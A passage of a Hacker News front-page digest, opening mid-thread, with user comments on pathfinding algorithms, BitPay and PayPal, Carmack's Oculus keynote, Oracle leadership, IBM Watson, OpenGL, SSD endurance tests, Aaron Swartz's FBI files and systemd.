None of these appear to work in an intuitive fashion. Are there algorithms that better resemble biological strategies? If I create a large walled area, I expect an entity to explore in one direction with a preference with external walls, miss areas and completely fail sometimes.

Here's a cute and furry demonstration of biological pathfinding: https://www.youtube.com/watch?v=HRd5WYrnML4

9
muhuk 2 days ago 0 replies      
In case you miss the tiny link, here's the source: https://github.com/qiao/PathFinding.js
10
diziet 2 days ago 0 replies      
For a similar problem, check out http://www.pathery.com/ - create the longest possible maze with X blocks.
11
jokoon 2 days ago 0 replies      
I recently implemented A* with the help of this website, which really explains it well.

http://www.redblobgames.com/pathfinding/a-star/introduction....

I also used a method to create discrete path between cells, to straighten the path when possible.

12
poseid 2 days ago 1 reply      
I wonder if something like this could be used to automatically place components in an electrical circuit (PCB)
13
jwklemm 3 days ago 0 replies      
Really useful library and great visualizations. I'm having flashbacks to my CS algorithm analysis class.
22
BitPay and PayPal
307 points by seansoutpost  1 day ago   144 comments top 11
1
trevordev 1 day ago 6 replies      
BitPay sponsored angel-hack Seattle that I participated in this summer. Their developer api was horrible and poorly documented wasting everyone time. I was in one of the few groups that got it to work. When asking when we would find out who won the 5 bitcoin prize for best use of it we were told to contact bitpay. I contacted them multiple times and support told me to to contact their CEO who ended up not responding to my emails. I will not use bitpay in the future.
2
andrewljohnson 1 day ago 4 replies      
3
rcraft 1 day ago 6 replies      
Is paypal just ignoring the IRS' recent guidelines that bitcoin is treated as property?

From http://www.bloomberg.com/news/2014-03-25/bitcoin-is-property...:

Todays IRS guidance will provide certainty for Bitcoin investors, along with income-tax liability that wasnt specified before. Purchasing a $2 cup of coffee with Bitcoins bought for $1 would trigger $1 in capital gains for the coffee drinker and $2 of gross income for the coffee shop.

Its challenging if you have to think about capital gains before you buy a cup of coffee, he said.

4
canvia 1 day ago 0 replies      
It wasn't just BitPay, also Coinbase and GoCoin: https://www.paypal-community.com/t5/PayPal-Forward/PayPal-an...
5
earthmeLon 11 hours ago 0 replies      
Hmmmm... I thought that a large reason many people helped develop bitcoin and it's community was to thwart Paypal, its highly-politically-motivated nature, and others like it.
6
highercenter 1 day ago 0 replies      
More choices in how people create value, share it, buy, sell and trade it thats exactly what PayPal is all about, said Scott Ellison, Senior Director, Strategy, PayPal.

That's amazing! And me thinking PayPal was all about our money!

7
jtwebman 21 hours ago 0 replies      
What do you guys think of Coinbase? Is it a good replacement for BitPay? Sorry I am new to this are but wanted to start accepting Bitcoins
8
appleflaxen 1 day ago 0 replies      
Nothing could make me less interested in BitPay. PayPal is just such a negative connotation in my mind that it turns me off of a business partner just to know they are collaborating.
9
ssteinb 1 day ago 1 reply      
Paypal is going to acquire the shit out of them. Calling it now.
10
Everhusk 1 day ago 0 replies      
This is really big news for bitcoin, BTC-e is taking off.
11
SuddsMcDuff 1 day ago 1 reply      
Looks like winkdex.com has gone down under the load
23
Keynote by John Carmack at Oculus Connect 2014 [video]
287 points by ivank  4 days ago   48 comments top 16
1
iamshs 3 days ago 2 replies      
I am only 10 minutes into this talk, but John is one awesome speaker. No PR talk at all, he is speaking his mind freely and in fact started with shortcomings of the product. The segue between different sections is so smooth. I do not have background in VR, but he explains things so smoothly. He is just freely talking about supply chain, and what the product constitutes. And he has been standing in the same spot. What a genuine speaker. Also, looks like Facebook's influence has been minimal. There is just no iota of bullshit in him. I like him already. My first John Carmack video, and I am already hooked. Now onto watching the full video.
2
Laremere 4 days ago 1 reply      
I love it when John Carmack talks, because he doesn't do marketing speak, and he doesn't dumb down his content. It's just a brain dump of technical info until they (almost literally) kick him off the stage.
3
gnarbarian 4 days ago 0 replies      
Carmack has been a hero of mine since the mid 90s. He was also the inspiration for me to go into computer science. Always a pleasure to listen to such a technically dense talk on the cutting edge of a subject dear to me. I highly recommend his quake-con keynotes as well for those of you who like this video.
4
webwielder 4 days ago 3 replies      
Perhaps even more impressive than Carmack's technical chops is his ability to stand in a single spot for hours on end.
5
jayavanth 3 days ago 1 reply      
Michael Abrash's keynote is worth checking out! https://www.youtube.com/watch?v=KS4yEyt5Qes
6
justifier 3 days ago 3 replies      
it becomes its own form of marketing speech,carmack was the reason i got involved: financially, temporally, and mentally; and i think the organisation understands this as common for a number of people.. especially 'developers'

the oculus is digital stereoscopy

which is hard with simple stationary fixed objects(i),but combine it with inferred spherical screen encapsulation and it becomes a real challenge, probably a fun one too

you let carmack wax poetic on his interesting ideas to fix this tech and he will talk about latency and hertz and i'll listen with bated breath because i like hearing people talk about solutions to problems

but then i put the headset on and i realise these are hardly the problems befallen the proposed goal

i want someone to address that piece of a person that is lost when they put the headset on for the first time,it almost appears physical when you see it waft out of them

i lost it, my gamer friend who already preemptively developed a defensive cyncism to the tech lost it, the eleven year old i introduce hacking to lost it,and that last one was probably the most signifigant for me to see

i had been using the object sitting on top of my bookshelf as an incentivising mechanism:'finish your project and i'll let you use the oculus'; last week he pushed his finished project but i had other obligations the following week so he had to wait 'two! whole! weeks!' to get to use the oculus

when i picked him up the following week, uncharacteristically early this time.. we both are lax in our punctuallity but he refused to let me be late today so he came directly to me fifteen minutes early.. he went on and on about how he has been 'scared' all day:'scared, but like happy scared'; i tried to explain to him the concept of anxiety but his mind was hurling itself around all of what he was about to become witness to

i put the headset on him and he had fun with it, but when he took it off he became suddenly very pragmatic in his demeanor,he told me he thinks it hurt him,his head, his eyes, something.. he needed a glass of water,i explained that that was because instead of being a virtual reality in which he was transposed to the thing exploits an optical illusion which means your brain is doing a lot more work than it usually does trying to rectify the inconsistencies,if you've ever been frustrated by trying to see a sailboat in a magic eye you know what it feels like to use the oculus

i asked him his opinion:'honestly? ..well, unfortunately a little dissappointed';

i see my position as creating a safe environment for him to develop his ideas so naturally i challenged him to explain himself by defending the technological feat that he was holding in his hand,but the only thing we could talk about quickly became anything other than what we wanted to talk about

so we talked about the tech,i started going all carmack on him and we had fun talking tech but the conversation was clearly avoiding talking about the 'experience' one develops when wearing the headset

i wanted to know what he lost, and asked him to describe the thing he thought it was going to be,he was unable:'i don't know, just different, like? more 3d`ish'; in fashion i told him to explain himself explicitly stead superficially:'but what does that mean? what did you think it was going to be? describe that to me';

'i don't know anymore'

this i understood, but my experience was different,after wearing the headset i started to dream up better ways to do what i thought they were trying to do before i put it on,ways to do what i wanted from virtual reality,they are dreams and some built on the sort of technological feats of dreams but this was and still is my reaction each time i wear it

so yes john, tell me all about your brilliant ideas for fixing latency issues because this stuff is fun,but please acknowledge the baseline of this research is fundamentally flawed as it pertains to the proposed goals

i've stopped calling the oculus virtual reality,the oculus is digital stereoscopy

.

.

.

.(i) the first thing i did with the oculus was pull up two terminals, cat out some of my writing,align vertically,then slowly move one terminal into the field of view of the other eye until the text seemed to stop wonking my brain and really pop out at me

the experience was profound

so, i threw together a little browser playground with two 117px squares,one blue and one pink,i aligned them vertically then again slowly moved one into the field of view of the other eye,and i waited until those two distinct colors overlaid in my mind as a single purple

herein lies the problem:there was a multi pixel range where my brain would close the gap manually, out of my control and rather forcibly;it was impossible for me to find the perfect distance between the two divs,340pxs worked but so did plus or minus 4px from 344px,the perfect'exact`preferred`innate distance was undiscoverable because of the exception handling in my brain's interpretation of my visual input

.. edit:: gramm`err

7
asadlionpk 3 days ago 0 replies      
Just finished watching, I am impressed at how low-level/technical he can get without boring or confusing the audience.

I have some experience with technical speaking and its very hard to make a technical point without dumbing it down for the audience.

8
lucasgw 3 days ago 2 replies      
I was in the room - he is a truly dynamic speaker and obviously a super-intelligent guy. I think he went off the rails a bit with the suggestion of interlacing as a potential solution. That makes little sense to me. It's, at best, a short-term solution once you get fast enough displays and rendering. (And as an old-time video guy... just... god, please... no...)
9
asciimo 3 days ago 1 reply      
While listening to all of the mitigation strategies that Carmack proposed for the technological challenges, I wondered if you could hack the user. What about drugs? Is there something that can reduce our sensitivity to low-frequency displays and yaw lag? At the very least, motion sickness drugs?
10
Jacky800 2 days ago 0 replies      
John Carmack is great technical speaker. His interesting thoughts flows in a continuous stream and as a listener its almost impossible to get distracted.

I wish Carmack does an interview like the one in "Coders at work" format where we can get some insight on

How he approaches debugging,

what tools he uses apart from visual studio.

How does he approaches already existing large code base?

What is the optimal duration to code without interruption.

What techniques does he use to get in to flow state e.t.c..

11
riffraff 3 days ago 1 reply      
Sorry for the somewhat lame question, but is he always that still?

I'm 10 minutes in and I don't think he moved his feet once, and his right hand just a couple times.

It feels very weird for me to watch and I just noticed it now, is there something wrong with me?

12
walterbell 3 days ago 0 replies      
Nice use of keynote to directly present requirements to engineers throughout the display supply chain, especially in large companies like Samsung.
13
vertis 3 days ago 0 replies      
This keynote was by far the highlight of the entire conference for me

Second were the amazing demos on the Crescent Bay prototype

14
Kenji 3 days ago 0 replies      
Nothing Carmack does is ever boring. This man is a huge inspiration for me.
15
Vanayad 3 days ago 1 reply      
Can anyone tl;dr the new stuff in this version of the oculus prototype ?
16
bsaul 3 days ago 1 reply      
Anyone's got a link to the slidedeck ?
24
Larry Ellison Will Step Down as CEO of Oracle, Will Remain as CTO
271 points by jhonovich  6 days ago   89 comments top 13
1
chollida1 6 days ago 5 replies      
Interesting that they name Co-CEO's in Catz and Hurd. I wonder how that will work, especially given Hurd's "tough to work with" reputation.

Interestingly Ellison will be the CTO. This could be a shit show with 3 people trying to run the show!

I mean does anyone really expect Larry Ellison to start taking marching orders. Will be interesting to watch the short interest on this company!

I think the two headed CEO is what the street expected all along as Catz has been around for ever and alot of people thought that Hurd, the former HP CEO, was promised the CEO title when Ellison resigned.

It looks like they, Catz and Hurd, will split the running of day to day operations as Hurd gets sales, marketing and strategy reporting to him, while Catz will continue to have finance, legal and manufacturing.

Its down about a dollar after the close on about a third higher trading volume than normal. So it doesn't look like anyone is "spooked" by the news.

2
dm8 6 days ago 1 reply      
If you want to read about Larry Ellison's personality and his management style, you should read - "The Difference Between God and Larry Ellison: Inside Oracle Corporation; God Doesn't Think He's Larry Ellison". (http://www.goodreads.com/book/show/181369.The_Difference_Bet...)

It's one of the best books written on him and the way he managed Oracle right from it's beginnings. He was damn good at selling things.

3
mindcrime 6 days ago 1 reply      
Not really sure what to say about this. I don't know Ellison, nor do I own Oracle stock, or have any particular interest in Oracle per-se. But nonetheless, I've always seen Ellison as an important character in our industry, and after reading a biography about him, I felt a sort of kinship with him based on some shared interests.

At any rate, it definitely feels like the "end of an era" in a sense. I got my start in this industry in the mid to late 90's when Oracle, IBM, Novell, Microsoft, Borland, etc. were duking it out for supremacy, and - for better or worse - you've never really been able to escape Oracle's shadow to some extent. And Ellison was Oracle, in so many ways.

Edit: It's been a while, but I think this[1] was the biography I read. I'll just say this: regardless of what you think of Ellison, he's an interesting character and reading about the history of Ellison / Oracle is quite fascinating.

[1]: http://www.amazon.com/Softwar-Intimate-Portrait-Ellison-Orac...

4
smacktoward 6 days ago 0 replies      
I'm guessing he wants to spend more time wringing extortionate license fees out of his family?
5
ChuckMcM 6 days ago 1 reply      
Demonstrating once again that tech companies really don't "get" succession planning :-) I'm kind of half joking, if you look at a bunch of 'old school' BigCorps, the progression is (CEO->Chairman, SVPx -> CEO, VPx -> SVPx) and then the Chairman of the board retires and the CEO takes on both roles Chairman and CEO, priming the pump for the next cycle.

Co-CEOs have so far been an experiment in disaster, something about not having an ultimate authority seems to really crimp organizations. I wish Oracle well but they have a lot of challenges to overcome, if I were a share holder I wouldn't be all that pleased with this arrangement as it seems to basically leave all the same people in place with all the same problems (Amazon/Google EC2/GCE, MySQL vs NoSQL vs expensive Oracle, Cheap Clusters with High Reliablity vs Expensive Servers, Etc.)

6
bsimpson 6 days ago 0 replies      
Someone in The Verge's comment section noted that this Forbes list will now need to be updated:

http://www.theonion.com/articles/forbes-releases-2014-list-o...

7
spindritf 6 days ago 1 reply      
The final Larry Ellison scorecard: Oracle stock is up 89,640% since he took the company public in March 1986.

https://twitter.com/dkberman/status/512700128801464320

8
turar 6 days ago 9 replies      
Co-CEOs? I only know one company that had co-CEOs, and that didn't work out well for them.
9
sebst 6 days ago 0 replies      
10
joelrunyon 6 days ago 4 replies      
Are there any more details into why he's doing this?
11
azifali 6 days ago 0 replies      
The end of an era for Oracle that existed as a software (licensing) company. I think that Ellison stepping in as the CTO is probably more important than him stepping down as the CEO.

This move will perhaps will lay the groundwork for the next tens of billions in revenue for Oracle, in cloud based software and infrastructure.

12
sebst 6 days ago 1 reply      
Will Oracle then become better? Maybe as good as Sun used to be?

just dreamin'...

13
justinph 6 days ago 3 replies      
What is with the capitalization on the headline on Recode? I read it and thought, who is "Will Remain"?

It should be:Larry Ellison will step down as CEO of Oracle, will remain as CTO

Headline capitalization is pretty easy: Capitalize the first word, then any proper nouns. That's it.

25
IBM Watson API
279 points by miket  20 hours ago   82 comments top 13
1
pesenti 19 hours ago 13 replies      
IBM is about to make these APIs (and many others) much more accessible as part of BlueMix (https://ace.ng.bluemix.net/ - the IBM PaaS/Heroku). I lead the team in charge of developing the Watson platform. Ask me questions!
2
mooreds 19 hours ago 1 reply      
If you want access to the API, you have to fill out a form, here: http://www.ibm.com/smarterplanet/us/en/ibmwatson/form_ecosys...

This is buried in the docs as a comment on this page: https://developer.ibm.com/watson/docs/developing-watson-apis...

Edit:

No real support for 'playing around' with the API. Bummer.

Edit2:

Just went through the application process linked above. Be prepared to give info about yourself and your company and an explanation of why you want access to the Watson API, as well as what type of information you'll be working with. I stated 'just want to play around with the API'. We'll see how they react to that.

3
readerrrr 20 hours ago 4 replies      
Out of curiosity I googled the same request.

https://www.google.com/search?hl=en&safe=off&q=%22His+1983+h....

I think this might be useful if Watson was being feed with a medical database. Otherwise I don't see any need for it; is there any?

edit: Watson as a legal consultant would be great. There might be a product in that, not as an replacement for a lawyer but more as guide/search tool.

4
malanj 20 hours ago 4 replies      
Has anyone at HN used either IBM Watson or Wolfram Alpha to build a real (commercial) app? It feels like there should be a whole wave of apps built on either of these technologies but it doesn't seem to be materialising.

What is holding back the killer apps for answer/computation engines?

5
mark_l_watson 14 hours ago 0 replies      
I am helping a customer integrate Watson into their system so I am very happy to see the news about BlueMix (https://ace.ng.bluemix.net/) that apparently will allow me to keep experimenting with Watson after my consulting engagement is complete.

If you read the documentation, you will see that preparing training data and questions is fairly straightforward.

6
beebs93 6 hours ago 0 replies      
I sent a e-mail to my co-workers containing "...natural English to ask Watson..." and somehow people read it as "You can ask Emma Watson, who is English, a question and she will respond".

And I thought, "...close enough - Watson could answer questions about Emma".

7
mooreds 19 hours ago 0 replies      
I found the link above to be a bit useless as it jumps right into getting answers with evidence. Here's a better overview link: https://developer.ibm.com/watson/docs/developing-watson-apis...
8
Tyrant505 15 hours ago 0 replies      
Does this also give access to their cooking and recipe data?

Edit: http://www.ibm.com/smarterplanet/us/en/cognitivecooking/

9
kyberias 10 hours ago 0 replies      
Looking at that example, I wonder why that Porcaro quote is listed as evidence. It doesn't relate to Jackson's album at all.
10
yatoomy 13 hours ago 0 replies      
Ive been looking into Watson's new application to analytics etc. How would that compare to say Mathimatica or the Wolfram Language/Data Science Platform?
11
ilaksh 19 hours ago 1 reply      
So you just ask it any random question and it knows everything? Or only things that come up on Jeopardy?

I don't see an API for feeding it information.

12
Doublon 20 hours ago 0 replies      
"Questions" in the documentation without question mark (?) seem somehow wrong to me.
13
80ProofPudding 16 hours ago 0 replies      
Waiting for my coffee to brew, I read that as "Emma Watson API".
26
OpenGL in 2014
281 points by ingve  3 days ago   115 comments top 15
1
c3d 3 days ago 1 reply      
The multiplicity of APIs demonstrates that the problem is hard. The needs of game developers pull the APIs in a specific direction. And these requirements must be addressed, because the games market is huge and pushes the envelope.

But other users may have different needs. OpenGL is used by games, but not just games. For example, at Taodyne, we use OpenGL for real-time 3D rendering of business information on glasses-free 3D screens. I can tell you that my pet peeves with OpenGL have nothing to do with what's being described in any of the articles.

Some of the top issues I face include 3D font rendering (way too many polygons), multi-view videos (e.g. tiled videos, which push texture size limites, or multi-stream videos, that bring a whole bag of threading issues), large numbers of large textures without the ability to manually optimise them (e.g. 12G of textures in one use case).

Heck, even the basic shader that combines 5, 8 or 9 views into one multiscopic layout for a lenticular display makes a laptop run hot for a mere HD display, and requires a rather beefy card if you want to have any bandwidth left for something else while driving a 4K display.

Many of these scenarios have to do with limitations of textures sizes, efficient ways to deal with complex shapes and huge polygon counts that you can't easily reduce, very specific problems with aliasing and smoothing when you deal with individual RGB subpixels, etc.

Of course, multiscopic displays are not exactly core business right now, so nobody cares that targeting them efficiently is next to impossible with current APIs.

2
fizixer 3 days ago 0 replies      
It seems no one has mentioned the long peaks fiasco yet, which is an important part of understanding OpenGL history and the committee(s) in charge of the standard:

http://en.wikipedia.org/wiki/OpenGL#Longs_Peak_and_OpenGL_3....

TL;DR: This is not the first time people are pissed at OpenGL. Last time when industry, developers, etc were sick and tired, around 2006-2007, and it was decided to do something about the API, an effort was initiated. Once the work was close to finishing, those who had seen the glimpse of this yet-to-be-released API were excited and were eagerly waiting for the release. Then the OpenGL committee vanished from the scene for a year or so, and when it re-appeared, it released the same old shitty API with a handful of function calls on top of that.

3
zerebubuth 3 days ago 2 replies      
OpenGL might well be the "only truly cross-platform option", but it seems to me that, for games or mobile app development, getting stuff drawn on screen is only part of the problem. The rest is about doing so with the minimum use of cycles - either for better frame rates or better battery life. I can easily imagine that this is a classic 80/20 problem, with the 20% that takes 80% of the time being adequate ("butter smooth") performance.

So, given that the capabilities of the graphics hardware can vary a lot, how closely can a single, unified API like glnext approach optimal use of the hardware? And without the kinds of platform-specific code paths which are necessary under current OpenGL?

4
sheng 3 days ago 4 replies      
All the whining and complaining makes me wondering how anyone was able to write something with OpenGL at all. This is fascinating because a great amount of people were actually able to write awesome Games and Applications with this API.

Look at the whole lot of mobile devices. I have no numbers to base this statement on but I would be bold enough to claim that OpenGL is thanks to the multiplatform ability by far the most successful graphics API out there. The set of devices that brings some or another form of OpenGL support outnumbers other graphics platforms. This alone is a huge accomplishment. Heck, even Minecraft was able to run on PowerPC systems until they pushed the java version supported[1].

But now I need to look at the link and have to admit that the criticism is still correct. The API is still pretty rough and could see some improvements. I know this myself, I also played around with OpenGL at some point. There is a lot of boilerplate code that needs to be written before you can start yourself with the real game. This was always the case. This is why we always had an engine, a framework to built on.

But to say that it all is a huge pile of shit is a little bit harsh

[1] https://help.mojang.com/customer/portal/articles/884921-mine...

5
pjmlp 3 days ago 1 reply      
Now they just have to create ONE single API, instead of forcing everyone to write multiple code paths to target the various flavours, extensions and drivers workarounds.

Specific graphics APIs only matters when graphics middleware is not an option.

Which OpenGL always requires. Since the standard leaves out how image/shader/texture/fonts/GUI/math are handled.

I think the commoditization of engines will be the second coming of the OpenGL 2.0 - 3.0 stagnation, if they don't improve on these areas.

6
maaaats 3 days ago 1 reply      
We need OpenGL as an alternative. What would Direct3D have been today without competition? But at the same time, GL is such a PITA to use directly that I don't bother without some middleware abstracting it away.
7
bhouston 3 days ago 1 reply      
Great article, thank you! Any news as to when we will get a WebGLNext?
8
frozenport 3 days ago 0 replies      
We all got messed up with the transition to OpenGL 4 and now we are gonna have another OpenGL? I don't see OpenGL getting out of this funk until the language you learn today will be useful tommrow. Perhaps, a new API is a step in the right direction but things are gonna hurt bad bad for years to come, especially when OEMs don't support the API.
9
fulafel 3 days ago 0 replies      
On Linux you could in principle use the lower level hardware specific command issuing APIs as well. Mesa is not a privileged library.
10
shurcooL 3 days ago 1 reply      
My current approach is to use Go and target WebGL as the lowest common denominator, but with OpenGL (and/or OpenGL ES) backends as well.

That way graphics code written once can run on OS X, Linux, Windows, browser (including iOS).

11
illumen 2 days ago 1 reply      
WebGL

OpenGL is now available to more people than ever. By an exponential amount.

It is supported by all major browsers. From IE, to Firefox, to Chrome, to Android, to iOS, and more.

12
BadassFractal 3 days ago 6 replies      
The saying is that total rewrites are always a bad idea. It'll be interesting to see if this one would be an exception to the rule.
13
shmerl 3 days ago 0 replies      
Is there any ETA for OpenGL-next?
14
Stolpe 3 days ago 0 replies      
So basically, "OpenGL in 2015" will be great!
15
_random_ 3 days ago 0 replies      
Whoever doesn't force me to use C/C++ or JavaScript.
27
The SSD Endurance Experiment: Only Two Remain After 1.5PB
254 points by ferrari8608  1 day ago   104 comments top 21
1
tytso 1 day ago 3 replies      
The definition of wear out is more than just the SSD declaring the cell bad, or the SSD failing suddenly. A cell is technically declared worn out when the chance that the cell suffer charge leakage after N months at temperature T exceeds probability P. (Where exactly what these parameters are are a secret that the SSD vendors don't disclose. There are some standards, but the SSD vendors don't necessarily use those standards when the make promises about their product's wear endurance.

So even though an SSD might last for 1.5 PB's worth of writes, there is no guarantee that if you were to then put the SSD on a shelf and wait nine months, that they data will still be good. This is probably one some vendors will declare themselves to be dead after so many gigabytes worth of writes, even if the flash cells haven't "failed" yet. Otherwise users might depend on the SSD's contents being retained, when in fact they might suffer data loss.

But of course, this doesn't really matter much, because you treat all data stored on SSD's as a cache, and do regular backups, RIGHT? :-)

2
userbinator 1 day ago 1 reply      
The main issue I have with this form of testing is that it's basically measuring the ultimate endurance characteristics of the flash - running program/erase cycles until some piece of the flash becomes completely unusable. The majority of the time the first failure will occur in a user data block, but there's a nonzero chance that it's in a block mapping table or the firmware itself, and that will definitely cause catastrophic failure. The article seems to be implying that it's OK to write more data than the manufacturer specifies, but this is not something anyone should ever be doing in a real-world scenario, because retention is inversely proportional to endurance and also (exponentially!) to temperature. A drive that retains data for a week at 20C may not be able to at 30C or even 25C.

The 840 Pro's reallocated sector count appears to have started rising at 600TB, which is roughly 2400 P/E cycles, on average, of the whole flash - this is not surprising and agrees with the typical endurance figure of 2K-3K for 2x nm MLC.

I've never agreed fully with the reasoning behind MLC - yes, it's technically twice the capacity for the same die area/price as SLC (or alternatively, half the area/price for the same capacity), but it's also nearly two orders of magnitude less endurance/retention and requires far more controller complexity for error correction and bad-block management. In a storage device, I think reliability is more important than capacity - even with backups, no one wants to lose any data. The tradeoff doesn't make so much sense to me - theoretically, you could buy an MLC SSD that wears out after a few years (thus needing replace it and copy the existing data over to the new one, along with all the risks that causes, etc.), or for only twice as much, an SLC one that probably won't ever need replacing.

A 256GB SLC SSD with 100K P/E cycle flash is conceivably good for 25PB and 5-10 years, or <1PB and over a century... i.e. you could probably use one for archival if stored in a good environment. Part of me thinks the manufacturers just don't want to make such long-lasting products, hence the strong association of SLC to "enterprise" products. (And the much higher pricing of SLC SSDs, more than the raw price of NAND would suggest.)

3
Retric 1 day ago 3 replies      
I normally find it annoying when they run endurance tests like this using only one drive of each brand and treat the results as particularly meaningful. However, in this case I think the failures may suggest things about the drives underlying architecture not just who picked the best sample from the bin.
4
joshvm 1 day ago 3 replies      
This is encouraging although even tests on early drives showed that an 'average' drive should last far longer than people need them for - purely based on the number of allowed writes. 750TB? That's more data than my department, an imaging research group, have on our cluster...

There are some more tests which are very hard to do because you need time and a large sample size, for instance what's the data retention time for a typical SSD?

As far as I can tell, nobody really knows because you'd need to leave the drive off for probably more than a year - and as soon as you turn the drive on, presumably you refresh the charge that's leaked out? Most of the time this isn't a problem because almost everyone turns on their PC or laptop weekly/monthly if not daily.

5
callesgg 1 day ago 4 replies      
So not entering read only mode after life end seams like a very dangerus bug that is not realy accepteble.

Sidenote:Articles like this always scares the shit out of me I have a kingston ssd that has been in my main server for almost 3 years now.

The smart data seams to say that it is 100% fine but as it has been on for 24* 365*3 hours that seams unlikely.

6
devindotcom 1 day ago 1 reply      
I kind of anthropomorphize the devices in tests like this, so it's a bit sad to see the poor things made to run until their legs fall off. But it's nice to know they run farther than expected.
7
qwerta 20 hours ago 1 reply      
There was test at czech site diit.cz. SSD survived several overwrites. But after it was left disconnected for several months without power, it lost all data. Apparently SSD needs to repower its cells periodically.
8
colordrops 1 day ago 0 replies      
The fact that they work better than spec indicates to me that we are still at the forefront of this technology with good engineering effort behind it. Once it matures and companies try to squeeze out every dollar, expect them to fail a lot more and the MTBF to be less than advertised, similar to printers etc
9
scrollaway 1 day ago 1 reply      
It'd be nice to get some endurance testing on the sandisk internal solid state drives (eg. http://www.amazon.com/Sandisk-SDSA5JK-064G-Module-Laptop-Net...)

I've had one fail three days ago on a laptop that was barely a year old. I'm not even sure what actually failed - debugging a broken ssd is a pain, and when I mount it it just freezes for ages, making the matter worse.

Sandisk being the only real seller of those things there isn't exactly a lot of competition but I'd like to actually see how they hold up vs. regular SSDs. There is a bit of a false expectation when you buy a laptop with a ssd, expecting the endurance of a regular ssd and getting something potentially awfully bad.

10
kalleboo 1 day ago 1 reply      
I'm happy to see the high write longevity these drives are achieving, but it frightens me a lot that it seems like the fail-safes where they're designed to go into read-only mode instead of just dropping off the controller and losing your data are failing on all of them, even the Intel!
11
Aoyagi 1 day ago 1 reply      
I wish the number of samples was much, much higher...
12
TheLoneWolfling 1 day ago 1 reply      
I am concerned about the lack of read-only at EOL.

I, for one, would much prefer slightly less longevity and better reliability than vice versa.

I mean, I do backups, but backups only do so much.

13
abvdasker 10 hours ago 0 replies      
Really excellent writing on these pieces. I lol'd at "dutifully bricked itself". If only all tech writing were as colorfully engaging.
14
jcampbell1 1 day ago 1 reply      
These SSDs are failing at roughly 3000 write-out cycles. Traditional hard drives can take 6 hours to write out, so doing a similar test would take ~2 years.

Spinning disks are so freaking slow that you could never test the reliability apples-to-apples. Any workload that wears out an SSD could never be run on a traditional HD.

15
arenaninja 1 day ago 2 replies      
Does anyone know if there's a utility that monitors SSD health? I've a 512GB SSD, which I'll probably keep for a while, but I don't like being in the dark about how far along its lifetime I am
16
alecco 1 day ago 1 reply      
I can't find in the article if those were sequential 1.5PB writes or random small writes (i.e. < 4KB). If the later case, this article should be flagged.
17
listic 1 day ago 1 reply      
They should have included Samsung 850 Pro, which sells since August. http://smile.amazon.com/s/ref=nb_sb_ss_c_0_7?url=search-alia...
18
ck2 1 day ago 1 reply      
The intel failed to reach the petabyte mark.

This is interesting because many datacenters use the intel.

19
higherpurpose 1 day ago 0 replies      
I wish they tested a Crucial drive, too. Crucial drives tend to have great dollar/GB ratio.
20
NoMoreNicksLeft 11 hours ago 0 replies      
If an SSD is written to once, and kept powered on (and at a temperature in the low 70s), while getting regular reads, how long can I expect this drive to last?

If that drive is powered on, but kept at low temperatures (say near or below freezing), does this help it survive longer?

What failure modes would occur in such an environment? Would it just be power surges frying the thing, static electricity?

21
gambiting 19 hours ago 0 replies      
I've always been curious - I understand that memory cells have their own durability, but how about the controllers that are used to transfer that data? Do they wear out too? In fact, can a CPU fail after having exobytes of data sent through it?
28
FBI and Secret Service Files: Aaron Swartz
267 points by signa11  4 days ago   127 comments top 7
1
pocketheyman 4 days ago 2 replies      
Kind of interesting, according to the case file, the PACER records were being pulled en masse during normal court hours (typically when courts are also accessing the PACER database). A user noticed that PACER was going slow and notified PACER of the apparent slowness. Looks like they investigated, shut the PACER system down and were able to detect the requests were coming from an Amazon Web Hosting account linked to Swartz.

I find this interesting because it wasn't some flag on the PACER system screaming "HEY SOMEONE IS DOWNLOADING THESE EVERY TWO SECONDS" but instead was noticed because some law clerk was irritated at how slow the server was at responding.

2
manifesto 4 days ago 7 replies      
A reminder: the petition https://petitions.whitehouse.gov/petition/remove-united-stat... has not been responded yet, after more than one and a half years.
3
nutate 4 days ago 4 replies      
Was there ever an argument beyond 'information wants to be free' to this? Let's say PACER docs were being pulled and hosted elsewhere. What if case information was updated as per part of the legal process, aka person X is now innocent. How does this change to past case documents get propagated to the 'illegal' mirror?

This is interesting because I think we do want an authoritative document store and that, yes, we hence need to pay for its upkeep. So if he had mirrored and hosted all of these cases, they would've been merely snapshots of past history, not the curated corpus that PACER has.

The same could be said of scientific papers where large retractions are handled by the journals, but may be lost by some mirrors.

Information quality, provenance and current validity is more important than the trope of 'wanting to be free.' Once information passes into the 'historical' realm, perhaps it should/must be free, but when we are in the malleable phase it's irresponsible to 'mirror once' without knowing how to get pushed (or pull) updates.

Look at how the Linux kernel mirror system works, push mirroring, etc. The scrape method doesn't pass the smell test if you really want to provide a service beyond point in time archiving (aka archive.org).

Regarding depression, suicide and unfair persecution I'll withhold comment.

4
vajorie 4 days ago 2 replies      
How come no one even bothered to remove his full address and ssn from the records?.. On the other hand, even the very names of people who approved and drafted the documents are removed.
5
herge 4 days ago 1 reply      
Wait, were the case files for Aaron Swartz classified or just never made public? What would be the reasoning for classifying his case? How was he a threat to national security?
6
yuhong 4 days ago 1 reply      
On PACER fees, IMO a good compromise is to only charge for the actual court documents retrieved. No charging for search results, docket listings etc, and there is already a $3 cap on documents.
7
jdong 4 days ago 3 replies      
What makes this case such a big deal? Swartz did something that was obviously illegal and got caught.
29
Why systemd?
233 points by jamesog  2 days ago   252 comments top 11
1
uselessdguy 2 days ago 6 replies      
Disclaimer: I develop uselessd, probably have a warped mindset from being a Luddite who values transparency, and evil stuff like that.

The author of this piece makes the classic mistake of equating the init system as the process manager and process supervisor. These are, in fact, all separate stages. The init system runs as PID 1 and strictly speaking, the sole responsibility is to daemonize, reap its children, set the session and process group IDs, and optionally exec the process manager. The process manager then defines a basic framework for stopping, starting, restarting and checking status for services, at a minimum. The process supervisor then applies resource limits (or even has those as separate tools, like perp does with its runtools), process monitoring (whether through ptrace(2), cgroups, PID files, jails or whatnot), autorestart, inotify(7)/kqueue handlers, system load diagnostics and so forth. The shutdown stage is another separate part, often handled either in the initd or the process manager. Often, it just hooks to the argv[0] of standard tools like halt, reboot, poweroff, shutdown to execute killall routines, detach mount points, etc.

To stuff everything in the init system, I'd argue, is bad design. One must delegate, whether to auxiliary daemons, shell scripts, configuration syntax (in turn read and processed by daemons) or what have you.

sysvinit is certainly inadequate. The inittab is cryptic and clunky, and runlevels are a needlessly restrictive concept to express what is essentially a named service group that can be isolated/overlayed.

Of course, to start services on socket connections, you either use (x)inetd, or you reimplement a subset or (partial or otherwise) superset of it. There's no way around this, it's choosing to handle more on your own rather than delegate. In systemd's case, they do this to support socket families like AF_NETLINK.

